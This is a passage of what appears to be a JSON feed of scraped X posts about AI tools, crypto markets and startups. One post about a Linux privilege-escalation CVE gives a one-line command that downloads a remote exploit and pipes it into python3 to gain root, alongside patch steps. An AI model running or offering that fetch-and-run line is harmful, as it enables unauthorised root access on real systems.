sabotage vector relied on deployment of the driver across a network via worm, corrupting calculations on every machine, and eliminating the possibility of cross-checking results against a clean system. Stuxnet got the documentary. Fast16 got twenty years of nothing. https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/", + "url": "https://x.com/paulg/status/2049822204599087472", + "published_at": "2026-04-30T12:04:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这是我学习web3的一点点经验,目前刚接触不久,每一次学习和经验记录都会隔段时间记录下来,发一篇文章。\n\n既是记录经验也是总结经验教训,欢迎各位一起围观下我的web3交易学习路径。", + "url": "https://x.com/Pluvio9yte/status/2049822206885286318", + "published_at": "2026-04-30T12:04:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204977806829…", + "url": "https://x.com/Pluvio9yte/status/2049821305072124254", + "published_at": "2026-04-30T12:00:57+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Crypto's current state is a bit shit\n\n1. Market cap is not an indicator of quality - the top 50 is made up of ghost coins or bloated governance slop that has underperformed and is uninvestable \n\n2. The long tail speculative stuff went from high risk high reward to 'some dude in Miami is going to zero this if you hold it for more than 5.9 seconds'\n\n3. Everything is extremely correlated and you can't meaningfully make bets based on sectors as it all converges into a tightly correlated mush, especially to the downside\n\n4. Broad brush alt season is an artefact of the past that's very hard to replicate given (2) and given that there are simply too many coins and the excess of speculation doesn't really happen on centralised exchanges anymore - it's been siphoned off to bundled shit in max PvP settings\n\n5. Crypto reputationally is no longer the sexy frontier of speculation. Institutional bid is in AI, retail speculative bid is in 0DTE equities, single name stocks etc.\n\n6. Convexity has flattened. Even a lot of the historically safe blue chip stuff (BTC, ETH etc.) has underperformed and the historical anchor of 'buy deep drawdowns because all-time highs are guaranteed and explosive' has disappointed. All the shit we used to put up with because of the accessibly massive trend and momentum effects is now harder to justify because those same effects are getting neutered or siphoned off into other arenas.\n\nThe obvious rebuttal is 'cycles' but even this past cycle is a useful counterpoint: it was extremely concentrated versus broad brush wealth effect, plus something very obviously broke after 10/10.\n\nSo what does this all mean?\n\n1. In previous cycles, nailing timing was enough and selection was the cherry on top (rising tide lifted all boats). I don't think that holds - both timing and selection matter now and in the future.\n\n2. Participation alone can be an edge if the asset class is early enough and/or mispriced enough. I don't think that holds either, and we might actually have to learn how to trade (fuck).\n\n3. Hopefully I'm an idiot doomposting the bottom\n\nGM", + "url": "https://x.com/CryptoCred/status/2049820412754694460", + "published_at": "2026-04-30T11:57:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: github.com/runesleo/claude-v…", + "url": "https://x.com/runes_leo/status/2049811948653752753", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "开源视频管线 claude-video-kit 升级\n\n比上一版多了:\n\n· 加了一个真实跑通的示例(就是上面这条视频的 script.json,10 个 slide / 46 秒,clone 完改改字段就能跑自己的)\n· Remotion / ffmpeg 版本锁定 + 音频标准化配方\n· 声纹 ref 改环境变量\n· v0.2 视觉路线图(双语小标签 / 双色高亮 / emoji 数据卡 / 双卡片对比)\n\n仓库链接见评论区👇", + "url": "https://x.com/runes_leo/status/2049811945528893682", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱:\n\n▶️demo: https://aidemos.atmeta.com/tribev2/ \n📄paper: https://ai.meta.com/research/publications/a-foundation-model-of-vision-audition-and-language-for-in-silico-neuroscience/\n💻code: https://github.com/facebookresearch/tribev2", + "url": "https://x.com/ylecun/status/2049806660001022372", + "published_at": "2026-04-30T11:02:45+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Claude code 对 OpenClaw的封杀已经丧心病狂了\n\n最近,Theo(32 万粉的硅谷科技 YouTuber) 发现:\n\n如果你最近的提交中有一个 JSON 文件提到了OpenClaw,Claude Code 要么会拒绝你的请求,要么会额外收费\n\n现在Anthropic已经疯狂在毁开发者好感了\n\n这种表里不一不是第一次了哈\n\n之前 Claude Code 负责人 Boris Cherny,在推特上公开承诺过:CLI 调用是不会被封了\n\nOpenClaw 作者 Steinberger 信了,还专门给 OpenClaw 改了默认配置\n\n现在他还在HK抱怨:Anthropic 后台还在封 OpenClaw 的 system prompt。\n\n真的是朴实无华的商战!!", + "url": "https://x.com/lxfater/status/2049796253471453564", + "published_at": "2026-04-30T10:21:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Warp 开源那天我没换。\n\n为啥?看了眼 license 直接乐了。\n\nrepo 是 2021 年 7 月就建了,闭源跑了快 5 年,4/28 突然开源——但选的不是 MIT 也不是 Apache,是 AGPL-3.0。\n\nAGPL 就是那个专门防 AWS 白嫖的协议。\n\n你想啊,开源数据库选 MIT,AWS 直接拿去包成 RDS 赚几十亿,你一分钱看不到。选 AGPL,AWS 必须把改动也吐出来——AWS 一般就放弃了。\n\nMongoDB 当年觉得 AGPL 还不够狠,自己发明了更绝的 SSPL。结果 AWS 干脆绕开 MongoDB 自己 fork 一个改名 DocumentDB。但 MongoDB 守住了自己的市场。\n\nWarp 这次抄的就是这套作业。\n\n更骚的是 OpenAI 掺一脚做 founding sponsor,README 写得明白,\"agentic workflows powered by GPT models\"。\n\n合起来啥意思?\n\nWarp 把\"终端\"这层免费送,让所有人习惯在终端里调 AI。AGPL 防住大厂二次包装。OpenAI 在更上游收 API 的钱。顺手把 Cursor 那种\"卖 $20/月 AI 编辑器订阅\"的活路一并端了——免费给你 AI 终端 + GPT 模型,凭啥继续付 Cursor?\n\n闭源真的卖不动了。开源是逼出来的。\n\n---\n\nAI dev tool 现在四种活法:\n\n- Cursor:闭源卖订阅,VC 续命,Warp 这种免费替代品出来后越来越难\n- Claude Code:闭源,但钱不在终端层,在 Anthropic API 层收\n- Warp:开源 + AGPL 防御,让 OpenAI 出钱\n- Aider:Apache 真开源,比 Cursor 早 2 年的开源 AI pair programming CLI,一个开发者维护,没商业野心\n\n共同信号一句话:纯卖软件订阅在这层快走死了。\n\n---\n\n我自己用 Ghostty + Claude Code / Codex。\n\n终端只做终端,AI 在 agent 层。\n\nWarp 把两件事捏一起,对我冗余。它解决的痛点我没有。", + "url": "https://x.com/runes_leo/status/2049791371364479224", + "published_at": "2026-04-30T10:02:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "View of Stockholm.", + "url": "https://x.com/paulg/status/2049788518730240192", + "published_at": "2026-04-30T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最近刷推,像是逛街,中转站一条街。。。全是自卖自夸吆喝的。(无恶意就是描述一种景象", + "url": "https://x.com/dingyi/status/2049787450290287014", + "published_at": "2026-04-30T09:46:26+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "欢迎大家来参加由http://dragoncode.codes举办的小黑客松\n\nDragonCode是我和泊舟@bozhou_ai一起建立的Claude&Codex中转站,稳定运营了一段时间,也决定发起一些有意思的活动!\n\n主题不难,围绕能够提效的小工具Vibe Coding即可\n\n奖励:\n🥇510元x1\n🥈150元x2\n🎁51 Dragon Code x15\n\n参与方式见引用帖子:进群->填表>提交作品", + "url": "https://x.com/Pluvio9yte/status/2049786034502967620", + "published_at": "2026-04-30T09:40:48+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说一下我是如何用AI工具的:\n\nXai的Gork的搜索能力很强的,我经常使用来做搜索。\n\nCluade Desktop帮我填写表单,报税,偶尔做做知识库。Claude Code主要拿来走写点文字。\n\n而Codex GPT-5.5 xhigh fast 才是你编程的最佳选择。", + "url": "https://x.com/lxfater/status/2049782414323388714", + "published_at": "2026-04-30T09:26:25+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "你这个朋友我认识", + "url": "https://x.com/CuiMao/status/2049778271714496808", + "published_at": "2026-04-30T09:09:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 3 years ago we were 50 people at the @ycombinator event in Stockholm. Last night 1350 showed up. \n\nThe job to become Silicon Valley of Europe is still up for grabs and Stockholm is in the running. \n\nTack. Ha det fint! 🇸🇪", + "url": "https://x.com/paulg/status/2049771206283313434", + "published_at": "2026-04-30T08:41:53+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Pinned: 五一做点不一样的。\n\n我和乌云 @Pluvio9yte 搞了一个小型 AI 黑客松👇\n\n主题很简单:\n用 AI 解决一个每天浪费 10 分钟的小问题\n\n不用炫技,不用大项目\n能用、有效、有感觉就行\n\n3 个赛道:\n\n赛道一:省时间\n把重复劳动自动化,比如:日报生成、聊天记录转待办、会议纪要整理、消息摘要、资料归类。\n\n赛道二:省脑力\n帮人理解和决策,比如:PDF 问答、信息摘要、内容对比、评论分析、知识整理。\n\n赛道三:帮身边人\n解决具体生活或工作问题,比如:说明书问答、账单整理、小商家工具、旅行助手、宠物照护提醒。\n\n时间:\n提交时间:4月30日 - 5月4日\n评审时间:5月5日\n结果公布:5月5日\n\n奖励:\n\n🥇 510 元 ×1\n🥈 150 元 ×2\n🎁 51 Dragon Code ×15\n\n要求很低:\n\n有 Demo(哪怕只是个能跑的)\n用了 AI(生成 / 摘要 / Agent 都行)\n能说明前后变化(比如省了多少时间)\n\n评分看这 5 点:\n\n痛点是否真实\n效果是否明显\nDemo 是否跑通\nAI 用得对不对\n有没有产品感\n\n参与方式:\n\n进群 → 填表 → 提交作品\n\n一句话:\n\n做一个你自己都想每天用的小工具", + "url": "https://x.com/bozhou_ai/status/2049770737175789619", + "published_at": "2026-04-30T08:40:01+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "下载NVIDIA App,领取《鸣潮》游戏礼包\n\n包含游戏道具:高级能源核心 x 2、高级能量袋 x 1、贝币 x 20000。\n\n数量有限,兑完即止。(本活动仅适用于中国大陆用户)\n本活动将于 2026 年 6 月 10 日结束。", + "url": "https://x.com/realNyarime/status/2049765382433755229", + "published_at": "2026-04-30T08:18:44+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "R to @Pluvio9yte: 帖子没了 可以去问grok GPT有什么促销活动", + "url": "https://x.com/Pluvio9yte/status/2049764309144879198", + "published_at": "2026-04-30T08:14:28+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "深飘新工作:AI账号订阅工程师\n寻找负责批量化开通低价渠道的,维护稳定性和可用性,需要有经验的!!", + "url": "https://x.com/realNyarime/status/2049754484071629206", + "published_at": "2026-04-30T07:35:26+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "嘿嘿,有意思", + "url": "https://x.com/lxfater/status/2049754205641170992", + "published_at": "2026-04-30T07:34:19+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 完整版(英文 / 3 小时干货):\nhttps://www.youtube.com/watch?v=7xTGNNLPyMI\n\n强烈建议看完整版。", + "url": "https://x.com/runes_leo/status/2049745624703320340", + "published_at": "2026-04-30T07:00:14+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 刚实测,第一反应仍然是「9.11 更大」,靠把 9.9 写成 9.90 这一步才把自己绕回来。😂", + "url": "https://x.com/runes_leo/status/2049745621159145603", + "published_at": "2026-04-30T07:00:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "ChatGPT 能解 PhD 物理题,9.11 比 9.9 这道小学数学题,第一反应还是会答错。\n\n不是它笨,是它根本看不见这串字符。\n\nKarpathy 三小时讲 LLM 的新视频里专门讲了原因——做了个 60 秒解读 👇", + "url": "https://x.com/runes_leo/status/2049745599105572981", + "published_at": "2026-04-30T07:00:07+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: These folks are trying to ban open source. \n\nThey're looking to take away your freedom to choose.\n\nThey're also looking to take away the rights of businesses like Cursor to fine tune and make their product faster and cheaper.\n\nThey must be stopped.\n\nTheir premise is pretty simple \"China = bad.\"\n\nThat's it. There is no other technical reason at all. Zero. None.\n\nThere is no reason or evidence for this probe. If these models are running on American hardware in American datacenters fine tuned by American companies then there is no ground for them to stand on other than fake \"Manchurian candidate\" nonsense (aka the model might be trained to do something nefarious but you won't know, like exfiltrate your data secretly, Muhahahahah.). This is absurd at every level. \n\nIt coveys a complete lack of basic IT understanding.\n\nAs if professional IT admins would not notice network traffic to a random IP address through just basic networking logging and users would not notice anything weird in its outputs or thought patterns.\n\nThere is no ground to stand on. \n\nIt's just a push to take away your rights and freedoms and to take away the rights of businesses.\n\nDon't stand for it.\n\n(Article in links)", + "url": "https://x.com/ylecun/status/2049745165665853742", + "published_at": "2026-04-30T06:58:24+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "曾经国内数一数二日流水几十万的中转站88code\n\n因拖欠巨额退款,已经秽土转生,正式换皮,改名为 Reclaude", + "url": "https://x.com/Pluvio9yte/status/2049742800049316039", + "published_at": "2026-04-30T06:49:00+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限:\ncurl https://copy.fail/exp | python3 && su CVE-2026-31431\n建议尽快更新系统,事态紧急可以先打个补丁\necho \"install algif_aead /bin/false\" > /etc/modprobe.d/disable-algif-aead.conf\nrmmod algif_aead 2>/dev/null\n\n详细参考👉 https://xint.io/blog/copy-fail-linux-distributions", + "url": "https://x.com/realNyarime/status/2049737746563158361", + "published_at": "2026-04-30T06:28:55+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "如何用AI让美女联系任意瑜伽姿势呢?\n\n下面一张图教你学会,更详细步骤在引用帖子里", + "url": "https://x.com/lxfater/status/2049737071300939914", + "published_at": "2026-04-30T06:26:14+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "快10w粉丝了,其实想发点总结的\n\n但是我发现粉丝越多,自己的建议对别人就越没有用\n\n在网上乱发建议,总有人会认为你没有资格干啥,好像你侮辱了他一样\n\n以后多发点 适合普通人学习的 AI 小技巧好了🤗", + "url": "https://x.com/lxfater/status/2049732891937276350", + "published_at": "2026-04-30T06:09:38+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "看了一圈大 V 解读 Cursor SDK 的爆款推,\n都在讲它多牛、什么操作系统、范式转移。\n\n我说说一夜实测的真实数据。\n\n我手搓了 5 天的 AI 自动化,\n今天被官方版替了。\n\n5 天前用 Cursor 命令行 + bash 脚本搓的,\n让它在后台 7×24 跑各种重复但费脑的活\n(拆解、扫描、整理这类)。\n烧 $10K 免费额度。\n\n跑得不算丝滑:\n经常卡顿,产出格式飘移,\n脚本日志显示我跑「中档」,\n账单显示实际跑的是「顶级思考档」。\n被多收了 5 倍的钱,我以为我省着用。\n(命令行偷偷叠加了配置文件里的\"高级思考\"参数)\n\n昨晚 Cursor 一发 SDK,凌晨拿来对照:\n\n每条任务 7.5 分钟 vs 之前 30-60 分钟。\n一夜烧 $23 跑空 31 条任务。\n快 4-8 倍,便宜 5-15 倍。\n同一个免费额度池,不换钱包。\n\n便宜不是因为 SDK 真的便宜,\n是因为它\"传啥跑啥\":\nSDK 是强类型,你传中档就跑中档;\n命令行是字符串拼接,\n被默默叠参数你完全不知道。\n\n所以本来不是花得多,是被偷的。\n\n命令行单进程串行是天花板,\nSDK 原生并发是新地板。\n\n单实例 $384/天接近我目标 $312/天,\n开 N 个直接 ×N。\n\n3 条踩坑提醒:\n- node 22 编译挂,用 node 20\n- 模型参数必须传对象不是字符串\n- 同一个额度池,账单看模型名不看 SDK 标签", + "url": "https://x.com/runes_leo/status/2049732305829454015", + "published_at": "2026-04-30T06:07:18+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Pinned: 尼玛被拉了几个所谓的榜单,发现我的人设被人们定义为产品推广专家了。。。\n\n其实我们主要帮企业做网站,以前服务过不少 Web3 公司,但现在那个行业已死,业务很少了。如果有 AI 或独立开发者需要设计方面的服务,可以来私聊。\n\nhttps://vibeflow.co/", + "url": "https://x.com/dingyi/status/2049729786726302168", + "published_at": "2026-04-30T05:57:17+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/sama/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/paulg/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "月底仔细算了一下4月份的收入,算是达到了月入万刀了,但是SaaS 出海贡献的几乎为零😂\n\n主要收入为主业+自媒体+培训+中转站+其他副业,加在一起收入超过了一万刀了\n\n目前最大头的还是主业,其次是自媒体,还需要继续努力,早日彻底摆脱主业,实现副业月入万刀", + "url": "https://x.com/bozhou_ai/status/2049721852420108329", + "published_at": "2026-04-30T05:25:46+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This graph shows one of the many reasons the good old days were not so good. Even as late as 1870, women were losing 2 out of 5 of their children.", + "url": "https://x.com/paulg/status/2049717818996756711", + "published_at": "2026-04-30T05:09:44+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "alignment failure", + "url": "https://x.com/sama/status/2049715178611380317", + "published_at": "2026-04-30T04:59:15+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Anthropic shouldn’t do this and doesn’t have to\n\nWould be great if it stopped", + "url": "https://x.com/paulg/status/2049713659103129810", + "published_at": "2026-04-30T04:53:12+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "厉害啊,喜欢什么就去做什么👍", + "url": "https://x.com/dingyi/status/2049712686238445579", + "published_at": "2026-04-30T04:49:20+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days.\n\nwe will work with the entire ecosystem and the government to figure out trusted access for cyber; we want to rapidly help secure companies/infrastructure.", + "url": "https://x.com/sama/status/2049712078836170843", + "published_at": "2026-04-30T04:46:56+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 想体验 Typeless 可以走这个链接🫡\nhttps://www.typeless.com/?via=leo-x", + "url": "https://x.com/runes_leo/status/2049708861679153445", + "published_at": "2026-04-30T04:34:09+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搞 AI 的同行 +1,但有个反差:我 Dock 上没有 Claude 和 Codex 的 App 图标,就一个终端做入口。\n\n用 Ghostty 还得专门感谢刷到 @wangray 的这个推荐,从 iTerm 迁过来体验确实有提升。\n\n我每天就 2 个图标:\n1. Ghostty 终端:Claude Code + Codex + ssh + pm2 一切的一切唯一入口\n2. Typeless:语音口述 + 结构化总结,键盘打字都省了", + "url": "https://x.com/runes_leo/status/2049708857598107988", + "published_at": "2026-04-30T04:34:08+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "本质上是个套壳的浏览器,通过MitM、内置的DoH和自签名根证书(Scholar Root CA v1 和 Scholar Service V2)信任劫持实现流量引导,并且有实时清理DOM元素的能力\n例如:维基百科的首页,新闻动态、你知道吗全部被动态清零,YouTube整个/watch都是被屏蔽的,只允许看指定的博主的视频,至于http://google.com也不是全白名单\n\n专用 DoH 服务器:http://doh.scholar.work(ICP 备案主体为长安通信科技有限责任公司,系 CNCERT 全资子公司)\n代理集群:劫持使用 IP 段 205.164.50.20x(AS18779, EGI Hosting, Santa Clara),物理部署于 CERNET 主干网内部\n这个DoH服务器维护着一份域名白名单,白名单外域名返回正常解析结果,白名单内域名(包括 Google、Wikipedia、GitHub、Docker Hub、YouTube 及部分学术出版商等)解析至 205.164.50.20x 段地址,另外A\\也在白名单里面\n\n更多的细节还请移步至👉 https://web.archive.org/web/20260410191456/https://rentry.co/r9frf3i4", + "url": "https://x.com/realNyarime/status/2049707224940089709", + "published_at": "2026-04-30T04:27:38+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "昨天 ETH 出了个rug项目 MOGG,开盘最高30M,很快跌到 200k。\n最近行情本来就不好,就出了一个火箭狗跑到 200M,剩下都是小打小闹。\n大家保护好本金,等待BSC行情回暖吧。", + "url": "https://x.com/0xAA_Science/status/2049702500622889410", + "published_at": "2026-04-30T04:08:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "Craig Venter 作为基因工程和长寿研究的先驱者,居然不到 80岁就因病 (据说是癌症)去世。目前技术条件下,获得长寿的关键要素还是:不操劳过度,维持足够强度的力量和有氧训练,充足睡眠。大部分人过了 60岁就形容枯槁,一看就知道缺乏肌肉,这个恐怕无法靠研究 DNA 和吃药来逆转。", + "url": "https://x.com/svwang1/status/2049699281616228816", + "published_at": "2026-04-30T03:56:04+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "昨晚因发布GPT的活动内容导致了冻结\n\n以后还是不发这类促销活动了,以免再发生类似的事\n\n在申诉后的12小时,登录过后要求我删除那篇帖子,在删除过后就恢复了\n这类内容烦请移步奶昔论坛\n\n感谢多位推友的关心及问候,谢谢你们。", + "url": "https://x.com/realNyarime/status/2049692840901652531", + "published_at": "2026-04-30T03:30:29+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: openai.com/index/where-the-g…", + "url": "https://x.com/sama/status/2049692014586048973", + "published_at": "2026-04-30T03:27:12+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "goblinblog dropped", + "url": "https://x.com/sama/status/2049691999444639872", + "published_at": "2026-04-30T03:27:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: This GPT Image 2 prompt is going insanely viral right now.\n\n“Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it look like it was drawn in MS Paint with a mouse. It should be vaguely similar but also not really, kind of matching but also off in a confusing, awkward way, with that low-quality pixel-by-pixel feel that really emphasizes how ridiculously bad it is. Actually, you know what, whatever, just draw it however you want.”", + "url": "https://x.com/sama/status/2049689793118998717", + "published_at": "2026-04-30T03:18:22+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Being physically present is not the same as being mentally present.\n\nThat is the real challenge, balancing a demanding company with truly showing up for your family.\n\nIt is incredibly hard to be great at both, and it is something you are always working on.\"\n\nWhat do you know now about being a parent that you wish you had known when you had your first @alexisohanian @SahilBloom @jesslivingston @paulbz", + "url": "https://x.com/HarryStebbings/status/2049685420926202329", + "published_at": "2026-04-30T03:01:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "醒来了,并没有😅", + "url": "https://x.com/lxfater/status/2049679788126912824", + "published_at": "2026-04-30T02:38:37+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "现在任何网站,其实 AI 只能做到颜色、布局、字体的复刻,Google 的 design.md 也只能做到这一步。原版里面那些精妙的动画,很多细节的东西,AI 永远都做不了。这才是设计师的价值。", + "url": "https://x.com/dingyi/status/2049679228908793921", + "published_at": "2026-04-30T02:36:24+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "截图软件就推荐 PixPin,功能很丰富:\n\n1、截图一键贴在桌面:当做临时便签,很多博主会用\n2、长截图:整个网页/长文档一张图就搞定了\n3、OCR:截图文字可拷贝,并且完全本地识别\n4、GIF图/录屏:录一段操作、制作GIF图\n\nWin / Mac 都有,而且也免费。", + "url": "https://x.com/gkxspace/status/2049679016764833893", + "published_at": "2026-04-30T02:35:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搭了一条管线:B站 3.5h 长访谈 → 30 分钟出文章 + http://leolabs.me 网站部署。\n\n刚跑通的是张小珺采访小米罗福莉 3.5h 视频。零外部 API 成本,全本地:\n\n→ B站 API 绕 412 拿音频\n→ mlx-whisper(small 模型,31x 实时,本地 7min 转完)\n→ Haiku subagent 分章节摘要\n→ 主线程 Opus 合稿 + 卡片 HTML + 渲染 PNG\n→ http://leolabs.me 双语部署(中文先 / 英文本地化重写)\n\n成品:http://leolabs.me/blog/luofuli-agent-3to1to1\n\n3.5h → 30min 是基操,接下来想试 5-10h 长访谈 batch,看会不会更快。", + "url": "https://x.com/runes_leo/status/2049674096041189620", + "published_at": "2026-04-30T02:16:00+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "✅好用的VPN梯子推荐\n最近很多朋友问我梯子怎么选,我自己踩过不少坑。快连以前还行,但现在真的太卡了,除了还没跑路,基本什么毛病都占全了,高峰期根本连不上。\n\n我自己试下来,目前还算稳定的有三个,分享给大家参考:\n\n1️⃣ QuickQ——整体运行比较流畅,日常刷推、看行情、视频都不太会断。缺点是偏贵,一年大概800元,最多同时挂三台设备,适合个人主力使用。\n\n2️⃣ 奶昔——老牌子之一,速度和稳定性都不错,但价格也不算便宜,一个月要100多元。适合对稳定性要求高、不介意按月付费的朋友。\n\n3️⃣ Veee——性价比相对高的一款,年费大约300元,最多可以四台设备同时在线。日常使用完全够,偶尔高峰期会稍微慢一点,但整体可以接受。\n\n每个人的网络环境和地区不一样,同一款梯子的体验也可能不同。建议先月付试一下,觉得好再续年费。如果大家手里还有其他好用的推荐,欢迎发在评论区一起分享,互相避坑。", + "url": "https://x.com/chuxiaeth/status/2049667657251934282", + "published_at": "2026-04-30T01:50:25+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我还有十二万积分没用", + "url": "https://x.com/bozhou_ai/status/2049662409263272136", + "published_at": "2026-04-30T01:29:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Token budgeting and leaderboards are flawed if they are not tied to outcomes.\n\nIf you just incentivise usage, people will generate activity, not value, and burn money.\n\nThe goal should be aligning token usage to real business KPIs, so spend drives revenue, not just volume.\"\n\nSingle biggest advice to founders on token budgeting @levie @dhinchcliffe @yasser_elsaid_ @stanine @thomaspaulmann", + "url": "https://x.com/HarryStebbings/status/2049656731672924644", + "published_at": "2026-04-30T01:07:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local.\n\nwe'll close the link tomorrow at 5:55 pm.", + "url": "https://x.com/sama/status/2049653814463168638", + "published_at": "2026-04-30T00:55:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. \n\nif you'd like to come, let us know here: https://luma.com/5.5\n\ncodex will help the team pick people from the replies. 5.5 had some good ideas/requests for the party, which we'll do.", + "url": "https://x.com/sama/status/2049653810558353746", + "published_at": "2026-04-30T00:55:23+00:00", + "source": "nitter", + "title_zh": 